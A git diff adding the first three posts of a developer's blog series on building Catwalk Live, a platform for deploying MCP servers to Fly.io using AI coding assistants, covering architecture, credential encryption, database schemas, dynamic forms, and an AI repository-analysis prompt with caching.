diff --git a/blog/01-genesis-building-vercel-for-mcp.md b/blog/01-genesis-building-vercel-for-mcp.md
new file mode 100644
index 0000000..4e96adb
--- /dev/null
+++ b/blog/01-genesis-building-vercel-for-mcp.md
@@ -0,0 +1,256 @@
+---
+title: "Part 1: Genesis - Building a Vercel for MCP Servers"
+series: "Catwalk Live Development Journey"
+part: 1
+date: 2025-12-11
+updated: 2025-12-27
+tags: [AI, MCP, architecture, vision, orchestration]
+reading_time: "8 min"
+commits_covered: "215deaa"
+---
+
+## The Spark
+
+December 11, 2025. I'm staring at the Model Context Protocol (MCP) documentation, and I see the problem clearly: **MCP servers are powerful but painful to deploy**.
+
+Want to give Claude access to your TickTick tasks? You need to:
+1. Clone the MCP server repository
+2. Install dependencies locally
+3. Configure environment variables
+4. Keep the process running
+5. Hope your firewall doesn't block it
+6. Restart everything when your laptop reboots
+
+There's a better way. **What if deploying an MCP server was as simple as deploying to Vercel?**
+
+Paste a GitHub URL. Enter your credentials. Get a stable endpoint. Done.
+
+That's the vision behind **Catwalk Live**.
+
+## The Meta-Challenge
+
+But here's where it gets interesting: **I decided to build this entire platform without writing code manually.**
+
+Not because I can't code - but because I wanted to answer a question that's been nagging at me:
+
+> **Can AI coding assistants build production-ready systems if orchestrated properly?**
+
+Not toy projects. Not demos. **Production systems** with:
+- Backend APIs
+- Database migrations
+- Encryption
+- Authentication
+- Infrastructure as code
+- Security hardening
+- Comprehensive tests
+
+The answer, spoiler alert: **Yes. But with massive caveats.**
+
+This blog series documents the **how** and the **what actually happened** - including all the failures, pivots, and hard-won lessons.
+
+## Why AI Orchestration?
+
+I'm not a traditional backend engineer. I can't write a FastAPI service from scratch. I don't remember SQLAlchemy patterns off the top of my head. I've never built a Fly.io deployment pipeline before.
+
+But I **can**:
+- ✅ Architect systems
+- ✅ Validate AI outputs
+- ✅ Debug integration issues
+- ✅ Understand security implications
+- ✅ Ship working products
+
+This is the skill shift happening in software development: from **"writing code line-by-line"** to **"orchestrating AI systems to build what you've designed."**
+
+I wanted to prove it could work. This project is the proof.
+
+## The Technical Vision
+
+Before the first commit, I needed a clear architectural vision. AI needs **structure** - vague prompts produce vague code.
+
+Here's what I designed:
+
+### Three-Layer Architecture
+
+```
+┌─────────────────┐
+│ Claude Desktop │ (MCP Client)
+│ (User) │
+└────────┬────────┘
+ │ HTTPS (Streamable HTTP)
+ ↓
+┌─────────────────┐
+│ Catwalk Live │ (Our Platform)
+│ - Frontend │ Next.js 15, React 19
+│ - Backend API │ FastAPI, PostgreSQL
+└────────┬────────┘
+ │ Fly.io Machines API
+ ↓
+┌─────────────────┐
+│ MCP Machine │ (Isolated Container)
+│ - mcp-proxy │ Streamable HTTP adapter
+│ - MCP Server │ User's server package
+└─────────────────┘
+```
+
+### Core Workflow
+
+1. **Analysis Phase**: User pastes GitHub repo URL → Claude analyzes the MCP server code → extracts package name, required credentials, available tools
+2. **Configuration Phase**: Platform generates dynamic credential form based on analysis → user enters API keys securely
+3. **Deployment Phase**: Backend encrypts credentials → spins up Fly.io container → injects environment variables → starts MCP server
+4. **Usage Phase**: Claude connects to stable endpoint → calls tools → gets results
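
Stitched together, the four phases look roughly like this. A hedged Python sketch with stubbed helpers; the function and service names are illustrative, not the actual Catwalk code:

```python
# Sketch of the four-phase workflow; every helper is a stub standing
# in for a real service (Claude analysis, encryption, Fly.io, etc.).

def analyze(repo_url: str) -> dict:
    """Phase 1: extract MCP config from the repository (stubbed)."""
    return {
        "package": "@example/mcp-server",
        "env_vars": [{"name": "API_TOKEN", "required": True, "secret": True}],
    }

def required_fields(analysis: dict) -> list[str]:
    """Phase 2: the dynamic credential form is just this list, rendered."""
    return [v["name"] for v in analysis["env_vars"] if v["required"]]

def deploy(analysis: dict, credentials: dict) -> dict:
    """Phases 3-4: validate, (conceptually) encrypt, start a machine."""
    missing = [f for f in required_fields(analysis) if f not in credentials]
    if missing:
        raise ValueError(f"missing credentials: {missing}")
    return {"status": "running", "endpoint": "https://example.dev/api/mcp/123"}

analysis = analyze("https://github.com/user/mcp-example")
deployment = deploy(analysis, {"API_TOKEN": "tk-secret"})
```

The point of the sketch: each phase consumes the previous phase's output, so a failure anywhere (bad analysis, missing credential) stops the pipeline with a clear error instead of a half-deployed machine.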
+
+### Key Technical Decisions
+
+**Frontend: Next.js 15** (App Router, React 19)
+- Why: Modern React, server components, excellent TypeScript support
+- Risk: Bleeding edge (App Router still maturing)
+- Mitigation: Stick to stable patterns, extensive testing
+
+**Backend: FastAPI** (Python 3.12)
+- Why: Modern async Python, automatic OpenAPI docs, excellent type hints
+- Risk: I don't know Python well
+- Mitigation: AI excels at Python - let it generate, I'll validate
+
+**Database: PostgreSQL 15+** (Fly.io managed)
+- Why: Production-ready, JSON support, reliable
+- Risk: Fly.io clusters can be fragile
+- Mitigation: Document recovery procedures (spoiler: I needed them)
+
+**Infrastructure: Fly.io** (Machines API)
+- Why: Firecracker VMs, isolated containers, simple API
+- Risk: More complex than serverless
+- Mitigation: Reference implementations exist
+
+**Encryption: Fernet** (symmetric encryption)
+- Why: Simple, secure, audited
+- Risk: Key management critical
+- Mitigation: Fly.io secrets, never logged
+
+**MCP Transport: Streamable HTTP** (2025-06-18 spec)
+- Why: Latest MCP standard, replaces deprecated SSE
+- Risk: Very new spec, limited examples
+- Mitigation: Close reading of spec, iterative testing
+
+## The AI Orchestration Strategy
+
+This is the heart of the method. I wasn't just using **one** AI assistant - I orchestrated **multiple AI systems** with different roles:
+
+### Stage 1: Prompt Refinement
+**Tool**: Custom prompt builder
+
+I started with a plain English idea:
+> "I want to deploy MCP servers from GitHub to the cloud"
+
+Then refined it into a detailed specification:
+> "Build a platform that accepts GitHub repo URLs, uses Claude API to analyze and extract MCP server configuration (package name, env vars, tools/resources/prompts), generates dynamic credential forms, encrypts credentials with Fernet, stores in PostgreSQL, deploys to Fly.io Machines with isolated environments, and implements MCP Streamable HTTP (2025-06-18 spec)."
+
+**Why this matters**: Specific prompts = specific code. Vague prompts = vague results.
+
+### Stage 2: Multi-AI Planning
+**Tools**: GPT-4, Claude, Google Gemini
+
+I submitted the refined prompt to all three AIs and compared architectural approaches. Where they agreed = probably good design. Where they disagreed = complexity indicator.
+
+**Example consensus**:
+- All recommended FastAPI for Python backend
+- All suggested Pydantic for validation
+- All recommended async SQLAlchemy
+
+**Example discrepancy**:
+- GPT-4 suggested asyncpg for PostgreSQL
+- Claude & Gemini suggested psycopg3
+
+I chose **psycopg3** (majority vote). Later proved correct when asyncpg failed with Fly.io's SSL parameters.
+
+### Stage 3: Implementation with Claude Code
+**Tool**: Claude Code (Anthropic CLI)
+
+Claude Code became the primary implementation agent. But I didn't just say "build it" - I created **structured context files**:
+
+- `AGENTS.md` - System prompt defining behavior and constraints
+- `context/ARCHITECTURE.md` - Technical design decisions
+- `context/CURRENT_STATUS.md` - Living document of progress and blockers
+- `CLAUDE.md` - Lessons learned, known pitfalls, debugging patterns
+
+These files act as **external memory** for the AI. Without them, AI "forgets" architectural decisions across sessions. With them, consistency is maintained.
+
+### Stage 4: Quality Gates
+**Tools**: CodeRabbit, Qodo, Gemini Code Assist, Greptile
+
+Every pull request gets reviewed by automated AI agents:
+- **CodeRabbit**: Security vulnerabilities
+- **Qodo**: Edge cases, error handling
+- **Gemini Code Assist**: Code quality, best practices
+- **Greptile**: Integration consistency
+
+Their feedback gets fed back to Claude Code for fixes. It's a **multi-agent validation loop**.
+
+## The First Commit
+
+December 11, 2025, 12:00 PM. Commit `215deaa`: "Initial commit"
+
+```bash
+$ git log --reverse --oneline | head -1
+215deaa Initial commit
+```
+
+The repository structure:
+```
+catwalk/
+├── backend/ # FastAPI application
+├── frontend/ # Next.js application
+├── context/ # AI context files
+├── AGENTS.md # AI system prompt
+└── README.md # Project overview
+```
+
+Nothing fancy. Just the scaffolding. But with **clear structure** from day one.
+
+The first real work began immediately after: Supabase authentication setup. Looking back, this was premature - we'd later rip it out for NextAuth.js. But that's the reality of building: some decisions get revisited.
+
+## What I Didn't Know Yet
+
+On day one, I had no idea:
+
+- That I'd fight PostgreSQL drivers for hours (asyncpg vs psycopg3)
+- That Fly.io database clusters would break and need recreation
+- That implementing Streamable HTTP would require deep spec reading
+- That authentication would become a multi-day debugging nightmare
+- That security reviews would find command injection vulnerabilities
+- That 12 days later I'd have a working production system
+
+But I knew the vision. I knew the architecture. And I had a plan to **orchestrate AI to build it**.
+
+## The Core Insight
+
+Here's what I learned on day one that shaped everything:
+
+> **AI needs structure to build production systems.**
+
+Not just code structure (classes, modules, functions). **Context structure**:
+
+1. **Clear specifications** (detailed prompts, not vague ideas)
+2. **Architectural boundaries** (what goes where, why)
+3. **Quality constraints** (type safety, security, validation)
+4. **Memory systems** (markdown files that persist across sessions)
+5. **Validation loops** (automated review, human verification)
+
+Without these, AI generates code that looks right but breaks in production.
+
+With these, AI becomes a **powerful multiplier** that can build things you couldn't build alone.
+
+## Up Next
+
+The foundation was set. The vision was clear. The AI orchestration strategy was designed.
+
+Next came the real work: building the core architecture, implementing Fernet encryption, designing dynamic forms, and creating the Aurora UI.
+
+That's Part 2.
+
+---
+
+**Key Commits**: `215deaa` (Initial commit), `f6e024a` (Supabase auth)
+**Related Files**: `/AGENTS.md`, `/context/Project_Overview.md`
+**Lines of Code**: ~200 (scaffolding)
+
+**Next Post**: [Part 2: Foundation - Architecture & Encryption](02-foundation-architecture-encryption.md)
diff --git a/blog/02-foundation-architecture-encryption.md b/blog/02-foundation-architecture-encryption.md
new file mode 100644
index 0000000..c63c821
--- /dev/null
+++ b/blog/02-foundation-architecture-encryption.md
@@ -0,0 +1,369 @@
+---
+title: "Part 2: Foundation - Architecture & Encryption"
+series: "Catwalk Live Development Journey"
+part: 2
+date: 2025-12-11
+updated: 2025-12-27
+tags: [architecture, encryption, database, security, forms]
+reading_time: "10 min"
+commits_covered: "b92443c...f5a957a"
+---
+
+## Where We Are
+
+Day 1, afternoon. The repository exists. The vision is clear. Now comes the hard part: **designing the foundational architecture that everything else builds on**.
+
+Get this wrong, and you'll refactor painfully later. Get it right, and features flow naturally.
+
+## The Challenge
+
+Catwalk Live needs to handle a deceptively complex flow:
+
+1. **Accept** GitHub URLs from users
+2. **Analyze** repositories with AI to extract MCP configuration
+3. **Generate** dynamic credential forms based on what the analysis found
+4. **Encrypt** sensitive credentials before storage
+5. **Store** deployments and credentials in a database
+6. **Deploy** isolated containers with injected environment variables
+7. **Expose** stable MCP endpoints that Claude can connect to
+
+Each step has security implications. Each step can fail. The architecture needs to be **resilient, secure, and maintainable**.
+
+## Core Architecture: Three Services
+
+I designed the backend around three core services:
+
+### 1. Analysis Service
+**Responsibility**: Take a GitHub URL, extract MCP server configuration
+
+```python
+class AnalysisService:
+ async def analyze_repo(self, repo_url: str) -> AnalysisResult:
+ """
+ Use Claude API (via OpenRouter) to:
+ - Fetch repository README and package.json
+ - Extract package name (npm or PyPI)
+ - Identify required environment variables
+ - List available tools, resources, prompts
+ """
+ pass
+```
+
+**Why separate**: Analysis is stateless, cacheable, and independent of deployments. It should work even if the database is down.
+
+### 2. Credential Service
+**Responsibility**: Encrypt and decrypt credentials securely
+
+```python
+from cryptography.fernet import Fernet
+
+class CredentialService:
+ def __init__(self, encryption_key: str):
+ self.cipher = Fernet(encryption_key.encode())
+
+ def encrypt_credentials(self, creds: dict) -> bytes:
+ """Encrypt credentials for storage"""
+ json_str = json.dumps(creds)
+ return self.cipher.encrypt(json_str.encode())
+
+ def decrypt_credentials(self, encrypted: bytes) -> dict:
+ """Decrypt credentials (only during deployment)"""
+ decrypted = self.cipher.decrypt(encrypted)
+ return json.loads(decrypted.decode())
+```
+
+**Why Fernet**: Symmetric encryption, well-audited, includes authentication (prevents tampering), simple API.
+
+**Critical security pattern**:
+- Credentials encrypted **before** hitting the database
+- Decrypted **only** in memory during deployment
+- Never logged, never returned in API responses
+- Master key stored in Fly.io secrets (not in code)
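
A minimal round trip showing the pattern, assuming the `cryptography` package. Key generation is a one-time step; in the real setup the key lives in Fly.io secrets, not in code:

```python
import json

from cryptography.fernet import Fernet

# One-time key generation; in production the key comes from an
# environment variable backed by Fly.io secrets, never from the repo.
key = Fernet.generate_key()
cipher = Fernet(key)

creds = {"TICKTICK_TOKEN": "tk-secret"}
encrypted = cipher.encrypt(json.dumps(creds).encode())

# Fernet is authenticated encryption: tampered ciphertext raises
# InvalidToken instead of silently decrypting to garbage.
decrypted = json.loads(cipher.decrypt(encrypted).decode())
```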
+
+### 3. Deployment Service
+**Responsibility**: Orchestrate the entire deployment lifecycle
+
+```python
+class DeploymentService:
+ async def create_deployment(
+ self,
+ name: str,
+ repo_url: str,
+ credentials: dict
+ ) -> Deployment:
+ """
+ 1. Retrieve cached analysis
+ 2. Validate credentials against analysis schema
+ 3. Encrypt credentials
+ 4. Store deployment in database
+ 5. Trigger container deployment (Fly.io)
+ 6. Return deployment info
+ """
+ pass
+```
+
+**Why orchestrate**: Deployment involves multiple steps across multiple systems. If any step fails, we need clear error messages and rollback capability.
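
One way to get that rollback capability: record an undo action for each completed step and unwind them in reverse on failure. A generic sketch, not the actual DeploymentService:

```python
# Each deployment step is paired with an undo action; on failure we
# unwind only the steps that actually completed, in reverse order.
def run_with_rollback(steps: list[tuple]) -> str:
    completed = []
    try:
        for action, undo in steps:
            action()
            completed.append(undo)
        return "running"
    except Exception:
        for undo in reversed(completed):
            undo()
        return "failed"

log = []

def fail():
    raise RuntimeError("machine create failed")

status = run_with_rollback([
    (lambda: log.append("encrypt"), lambda: log.append("undo:encrypt")),
    (lambda: log.append("db-insert"), lambda: log.append("undo:db-insert")),
    (fail, lambda: log.append("undo:machine")),
])
```

Here the third step fails, so only the first two undos run, newest first: the database row is removed before the encryption artifacts.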
+
+## Database Schema: Simple But Powerful
+
+AI agents suggested complex schemas. I kept it simple:
+
+### Deployments Table
+
+```sql
+CREATE TABLE deployments (
+ id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+ user_id UUID REFERENCES users(id) ON DELETE CASCADE,
+ name TEXT NOT NULL,
+ repo_url TEXT NOT NULL,
+ status TEXT NOT NULL CHECK (status IN (
+ 'pending', 'deploying', 'running',
+ 'stopped', 'failed'
+ )),
+ machine_id TEXT UNIQUE, -- Fly.io machine ID
+ schedule_config JSONB NOT NULL, -- {mcp_config: {package, tools, env_vars}}
+ connection_url TEXT, -- e.g., "https://backend.fly.dev/api/mcp/{id}"
+ access_token TEXT, -- For MCP endpoint authentication
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ error_message TEXT
+);
+
+CREATE INDEX idx_deployments_user_id ON deployments(user_id);
+CREATE INDEX idx_deployments_status ON deployments(status);
+```
+
+**Design decisions**:
+
+1. **`schedule_config` as JSONB**: Flexible schema - different MCP servers need different configs. PostgreSQL's JSONB lets us query this later if needed.
+
+2. **`status` with CHECK constraint**: Explicit states prevent invalid transitions. Can't accidentally set status to "bananas".
+
+3. **`machine_id` UNIQUE**: Each deployment gets one machine. Constraint prevents duplicate deployments.
+
+4. **`connection_url` denormalized**: Could compute from ID, but storing it makes API responses faster.
+
+5. **`access_token` for auth**: Each deployment gets a unique token. Prevents unauthorized MCP access.
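
For the per-deployment token, Python's `secrets.token_urlsafe` is the standard way to mint an unguessable value. A sketch; the real column may be populated differently:

```python
import secrets

def new_access_token() -> str:
    # 32 random bytes -> a ~43-character URL-safe string, suitable for
    # an Authorization header or a path/query parameter.
    return secrets.token_urlsafe(32)

token = new_access_token()
```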
+
+### Credentials Table
+
+```sql
+CREATE TABLE credentials (
+ id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+ deployment_id UUID NOT NULL UNIQUE REFERENCES deployments(id) ON DELETE CASCADE,
+ encrypted_data BYTEA NOT NULL,
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
+);
+```
+
+**Why separate table**:
+- Credentials are sensitive - separate table, separate access controls
+- `ON DELETE CASCADE` - deleting deployment deletes credentials automatically
+- `UNIQUE` constraint on `deployment_id` - one credential set per deployment
+
+### Analysis Cache Table
+
+```sql
+CREATE TABLE analysis_cache (
+ id SERIAL PRIMARY KEY,
+ repo_url TEXT NOT NULL UNIQUE,
+ data JSONB NOT NULL,
+ expires_at TIMESTAMPTZ NOT NULL,
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
+);
+
+CREATE INDEX idx_analysis_cache_expires ON analysis_cache(expires_at);
+```
+
+**Why cache**: Claude API costs money. If 10 users analyze the same repo, run analysis once, cache for 24 hours.
+
+**Expiration strategy**: Simple TTL. A background job could clean expired entries, but filtering with `WHERE expires_at > NOW()` at read time is fast enough.
+
+## Dynamic Form Generation: The Magic
+
+Here's a cool part: **forms that generate themselves based on AI analysis**.
+
+User analyzes `github.com/user/mcp-ticktick`. Claude extracts:
+
+```json
+{
+ "package": "@hong-hao/mcp-ticktick",
+ "env_vars": [
+ {
+ "name": "TICKTICK_TOKEN",
+ "description": "Your TickTick API token",
+ "required": true,
+ "secret": true
+ }
+ ]
+}
+```
+
+Frontend receives this and **generates a form dynamically**:
+
+```typescript
+// frontend/components/dynamic-form/FormBuilder.tsx
+export function FormBuilder({ envVars }: { envVars: EnvVar[] }) {
+  const schema = generateZodSchema(envVars);
+  const form = useForm({ resolver: zodResolver(schema) });
+
+  return (
+    <form>
+      {envVars.map((envVar) => (
+        <FormField key={envVar.name} control={form.control} name={envVar.name}
+          type={envVar.secret ? "password" : "text"} />
+      ))}
+    </form>
+  );
+}
+```
+
+**Why this works**:
+- No hardcoded forms - adapts to any MCP server
+- Type-safe (Zod schema generated from analysis)
+- Required fields enforced client-side and server-side
+- Secrets automatically use password inputs
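
The server-side half of that enforcement can be driven by the same analysis schema. A hypothetical helper, not the actual backend code:

```python
def validate_credentials(env_vars: list[dict], submitted: dict) -> list[str]:
    """Return a list of validation errors; an empty list means valid."""
    errors = []
    known = {v["name"] for v in env_vars}
    # Every required variable from the analysis must be present and non-empty.
    for var in env_vars:
        if var.get("required") and not submitted.get(var["name"]):
            errors.append(f"{var['name']} is required")
    # Reject fields the analysis never asked for.
    for name in submitted:
        if name not in known:
            errors.append(f"unexpected field: {name}")
    return errors

env_vars = [{"name": "TICKTICK_TOKEN", "required": True, "secret": True}]
```

Rejecting unknown fields matters as much as requiring known ones: anything that reaches the container as an environment variable should have been declared by the analysis.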
+
+**The Zod schema generation** (this was AI-generated and it's beautiful):
+
+```typescript
+function generateZodSchema(envVars: EnvVar[]): z.ZodObject<z.ZodRawShape> {
+  const shape: Record<string, z.ZodString> = {};
+
+ envVars.forEach(envVar => {
+ let field = z.string();
+
+ if (envVar.required) {
+ field = field.min(1, `${envVar.name} is required`);
+ }
+
+ if (envVar.name.includes('URL')) {
+ field = field.url('Must be a valid URL');
+ }
+
+ shape[envVar.name] = field;
+ });
+
+ return z.object(shape);
+}
+```
+
+AI-generated validation that actually works. This is where AI shines: boilerplate that follows clear patterns.
+
+## Aurora UI: The Design System
+
+The frontend needed to feel modern, trustworthy, and **fast**. We landed on "Aurora" - a glassmorphic design system inspired by Vercel but with more color.
+
+**Design principles**:
+
+1. **Glassmorphism**: Semi-transparent panels with backdrop blur
+2. **Gradient accents**: Purple-to-blue gradients for CTAs
+3. **Dark-first**: Dark mode by default (developers love dark mode)
+4. **Fast animations**: 150ms transitions, nothing slower
+5. **Accessible**: WCAG AA contrast ratios, keyboard navigation
+
+**Key components** (all AI-generated, then refined):
+
+```tsx
+// Button with gradient
+<Button variant="gradient">Deploy</Button>
+
+// Glassmorphic card
+<Card className="bg-glass border border-glass-border backdrop-blur">
+  <CardHeader>
+    <CardTitle>Deployment Status</CardTitle>
+  </CardHeader>
+  <CardContent>
+    {/* ... */}
+  </CardContent>
+</Card>
+
+// Status badges
+<Badge variant="success">Running</Badge>
+<Badge variant="destructive">Failed</Badge>
+```
+
+**TailwindCSS 4 configuration**:
+
+```typescript
+// tailwind.config.ts
+export default {
+ theme: {
+ extend: {
+ backdropBlur: {
+ xs: '2px',
+ },
+ colors: {
+ glass: 'rgba(255, 255, 255, 0.1)',
+ 'glass-border': 'rgba(255, 255, 255, 0.2)',
+ },
+ },
+ },
+};
+```
+
+**Result**: A UI that feels premium without being over-designed. Clean, modern, functional.
+
+## What I Learned: AI's Strengths and Gaps
+
+### Where AI Excelled ✅
+
+1. **Database migrations**: Generated Alembic migrations perfectly from schema changes
+2. **Form components**: Dynamic form builder worked first try
+3. **Type definitions**: TypeScript types from Pydantic schemas
+4. **Boilerplate**: FastAPI route structure, React component scaffolding
+
+### Where AI Struggled ❌
+
+1. **Security edge cases**: Didn't validate package names initially (command injection risk)
+2. **Async patterns**: Race conditions in concurrent analysis requests
+3. **Database constraints**: Suggested overly complex foreign key relationships
+4. **Design decisions**: No opinion on "should this be one table or two?"
+
+**The pattern**: AI is great at **implementation** of decisions you've made. It's weak at **making** those decisions.
+
+## The Foundation in Numbers
+
+At the end of day 1:
+
+- **Commits**: 6 (b92443c → f5a957a)
+- **Database tables**: 4 (users, deployments, credentials, analysis_cache)
+- **API endpoints**: 8 (analyze, deployments CRUD, forms)
+- **Frontend pages**: 3 (landing, dashboard, configure)
+- **Lines of code**: ~1,200 (backend + frontend)
+- **Tests**: 0 (we'll regret this later)
+- **Security vulnerabilities**: At least 2 (we'll find them later)
+
+**Status**: Foundation complete, but untested. Time to build on it.
+
+## Up Next
+
+The architecture is solid. The database is designed. Forms are dynamic. Encryption is working.
+
+But there's a critical missing piece: **the AI analysis engine**. How do you actually get Claude to analyze an arbitrary GitHub repository and extract MCP configuration?
+
+That's Part 3: The AI Analysis Engine.
+
+---
+
+**Key Commits**:
+- `b92443c` - Initialize Phase 3 Credential Management
+- `4d6b32b` - Credential Management Foundation and Dynamic Forms
+- `a06d684` - Centralized form schemas and error handling
+- `f5a957a` - Implement Aurora UI
+
+**Related Files**:
+- `backend/app/models/` - Database models
+- `backend/app/services/credential_service.py` - Encryption service
+- `frontend/components/dynamic-form/` - Dynamic forms
+
+**Next Post**: [Part 3: The AI Analysis Engine](03-ai-analysis-engine.md)
diff --git a/blog/03-ai-analysis-engine.md b/blog/03-ai-analysis-engine.md
new file mode 100644
index 0000000..100c850
--- /dev/null
+++ b/blog/03-ai-analysis-engine.md
@@ -0,0 +1,436 @@
+---
+title: "Part 3: The AI Analysis Engine"
+series: "Catwalk Live Development Journey"
+part: 3
+date: 2025-12-12
+updated: 2025-12-27
+tags: [AI, Claude, prompt-engineering, OpenRouter, caching]
+reading_time: "12 min"
+commits_covered: "af021a1...02f9346"
+---
+
+## The Core Problem
+
+We have a platform. We have a database. We have encryption. But there's a fundamental question we haven't answered:
+
+> **How do you teach an AI to analyze an arbitrary MCP server repository and extract everything needed for deployment?**
+
+This isn't a simple parsing task. MCP servers come in all shapes:
+- Different package managers (npm, PyPI)
+- Different languages (TypeScript, Python)
+- Different documentation styles
+- Different credential requirements
+
+The AI needs to:
+1. Find the repository (given only a GitHub URL)
+2. Read the README and package.json/pyproject.toml
+3. Understand what the server does
+4. Extract the exact package name
+5. Identify ALL required environment variables
+6. List available tools, resources, and prompts
+7. Return structured JSON we can trust
+
+**And it needs to do this reliably, every time.**
+
+## The First Attempt: Naive Prompting
+
+My first prompt to Claude was embarrassingly simple:
+
+```
+Analyze this GitHub repository and tell me what MCP server it contains:
+{repo_url}
+```
+
+Result: A conversational response about what the repo does. Useless.
+
+**Lesson 1**: AI needs **explicit structure** in prompts. "Tell me about X" gets you prose. "Return JSON with these exact fields" gets you structured data.
+
+## The Second Attempt: Structured Output
+
+Better prompt:
+
+```
+Analyze this MCP server repository and return ONLY valid JSON:
+
+{
+ "package": "exact package name",
+ "env_vars": [
+ {"name": "VAR_NAME", "description": "...", "required": true}
+ ],
+ "tools": ["tool1", "tool2"],
+ "resources": ["resource1"],
+ "prompts": ["prompt1"]
+}
+
+Repository: {repo_url}
+```
+
+Result: JSON! But incomplete. Claude couldn't access the repository.
+
+**Lesson 2**: LLMs don't browse the web by default. You need to **enable web access explicitly**.
+
+## The Solution: OpenRouter + Web Search Plugin
+
+Enter **OpenRouter** - an API gateway that adds capabilities to LLMs, including web search.
+
+```python
+from openai import AsyncOpenAI
+
+client = AsyncOpenAI(
+ base_url="https://openrouter.ai/api/v1",
+ api_key=settings.OPENROUTER_API_KEY
+)
+
+response = await client.chat.completions.create(
+ model="anthropic/claude-haiku-4.5",
+ messages=[{
+ "role": "user",
+ "content": analysis_prompt
+ }],
+ extra_body={
+ "plugins": [{
+ "id": "web",
+ "max_results": 2 # CRITICAL: Limit results
+ }]
+ }
+)
+```
+
+**Why `max_results: 2`**: This was learned the hard way (see "The 200k Token Overflow" below).
+
+**Why Claude Haiku 4.5**: Fast, cheap, good enough for structured extraction. No need for Opus.
+
+## The Prompt: V3 (Production Version)
+
+After multiple iterations, here's the prompt that actually works:
+
+```python
+ANALYSIS_SYSTEM_PROMPT = """
+You are an expert at analyzing MCP (Model Context Protocol) server repositories.
+
+Your task: Given a GitHub repository URL, extract deployment configuration.
+
+INSTRUCTIONS:
+1. Use web search to find the repository
+2. Focus on: README.md, package.json, pyproject.toml
+3. DO NOT read every file - prioritize entry points
+4. Extract ONLY what's listed below
+5. Return ONLY valid JSON (no markdown, no explanation)
+
+OUTPUT SCHEMA:
+{
+ "package": "exact npm package name (e.g., '@user/mcp-server') OR exact PyPI package name",
+ "name": "human-friendly name (e.g., 'TickTick MCP Server')",
+ "description": "one-sentence description",
+ "env_vars": [
+ {
+ "name": "UPPERCASE_VAR_NAME",
+ "description": "clear explanation",
+ "required": true/false,
+ "secret": true/false,
+ "default": "value or null"
+ }
+ ],
+ "tools": ["tool1", "tool2"],
+ "resources": ["resource1"],
+ "prompts": ["prompt1"],
+ "notes": "any special requirements or warnings"
+}
+
+CRITICAL RULES:
+- package name must be EXACT (used for 'npx {package}' or 'pip install {package}')
+- env_vars must include ALL required credentials
+- Use web search efficiently (limit to 2-3 queries)
+- If unsure, note it in "notes" field
+
+Repository: {repo_url}
+"""
+```
+
+**Key elements**:
+
+1. **Clear role**: "You are an expert at analyzing MCP repositories"
+2. **Explicit task**: "Extract deployment configuration"
+3. **Structured output**: Exact JSON schema with types
+4. **Constraints**: "DO NOT read every file" (prevents token overflow)
+5. **Escape hatch**: `notes` field for uncertainty
+
+**Why "ONLY valid JSON"**: Claude loves to wrap JSON in markdown code blocks. This instruction reduces that.
+
+## The 200k Token Overflow
+
+December 21, 2025. Users report: "Analysis is hanging forever."
+
+I check the logs:
+
+```
+RequestValidationError: Input too large (250,000 tokens)
+```
+
+**What happened**: OpenRouter's web search plugin, without `max_results` limit, was fetching ENTIRE GitHub documentation pages. One analysis consumed 250k tokens.
+
+**The fix**:
+
+```python
+"plugins": [{
+ "id": "web",
+ "max_results": 2 # Only fetch first 2 search results
+}]
+```
+
+Combined with prompt instruction: "Focus on README and package.json only"
+
+**Result**: Token usage dropped from 250k to ~5k. Response time from "timeout" to 3 seconds.
+
+**Lesson 3**: Always **limit** what you ask AI to process. More input ≠ better output.
+
+## Parsing the Response: Trust But Verify
+
+Claude returns text. We need to extract JSON:
+
+```python
+async def analyze_repo(self, repo_url: str) -> AnalysisResult:
+    response = await self.client.chat.completions.create(...)
+
+    content = response.choices[0].message.content
+
+    # Try JSON extraction (Claude sometimes wraps in markdown)
+    json_match = re.search(r'```json\s*(\{.*?\})\s*```', content, re.DOTALL)
+    if json_match:
+        content = json_match.group(1)
+    else:
+        # Maybe it's raw JSON
+        json_match = re.search(r'\{.*\}', content, re.DOTALL)
+        if json_match:
+            content = json_match.group(0)  # no capture group in this pattern
+
+    # Parse and validate
+    data = json.loads(content)
+    return AnalysisResult(**data)  # Pydantic validation
+```
+
+**Defense in depth**:
+1. Regex extraction (handles markdown-wrapped JSON)
+2. Fallback to raw JSON search
+3. Pydantic validation (ensures schema compliance)
+4. Exception handling (log failures, return user-friendly errors)
+
+**Why regex**: AI is unpredictable. Sometimes it returns `{"package": "..."}`. Sometimes it returns ` ```json\n{"package": "..."}\n``` `. Regex handles both.
+
+## Caching Strategy: Save Money, Save Time
+
+Claude API costs money. Analyzing the same repo twice is wasteful.
+
+**Solution**: PostgreSQL-backed cache with 24-hour TTL.
+
+```python
+async def analyze_repo_cached(
+    self, repo_url: str, force: bool = False
+) -> AnalysisResult:
+    # Normalize URL (github.com/user/repo vs github.com/user/repo/)
+    normalized_url = repo_url.rstrip('/')
+
+    # Check cache
+    cached = await self.cache_service.get(normalized_url)
+    if cached and not force:
+        return cached
+
+ # Cache miss - run analysis
+ result = await self.analyze_repo(normalized_url)
+
+ # Store in cache
+ await self.cache_service.set(
+ url=normalized_url,
+ data=result,
+ ttl=timedelta(hours=24)
+ )
+
+ return result
+```
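
`rstrip('/')` covers the common case; a slightly more thorough normalization (a sketch, not the shipped code) also handles host casing, `.git` suffixes, and query strings:

```python
from urllib.parse import urlparse

def normalize_repo_url(url: str) -> str:
    """Canonicalize GitHub URLs so equivalent spellings share a cache key."""
    parts = urlparse(url.strip())
    path = parts.path.rstrip("/")
    if path.endswith(".git"):
        path = path[: -len(".git")]
    # Query strings and fragments are dropped intentionally: they never
    # change which repository is being analyzed.
    return f"{parts.scheme}://{parts.netloc.lower()}{path}"
```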
+
+**Cache invalidation**:
+
+```python
+# Manual cache clearing (admin only)
+@router.delete("/api/analyze/cache")
+async def clear_cache(repo_url: str):
+ await cache_service.delete(repo_url)
+ return {"message": "Cache cleared"}
+
+# Force refresh (any user)
+@router.post("/api/analyze")
+async def analyze(repo_url: str, force: bool = False):
+ result = await service.analyze_repo_cached(repo_url, force=force)
+ return result
+```
+
+**Why 24 hours**: MCP servers don't change that often. 24 hours balances freshness vs cost.
+
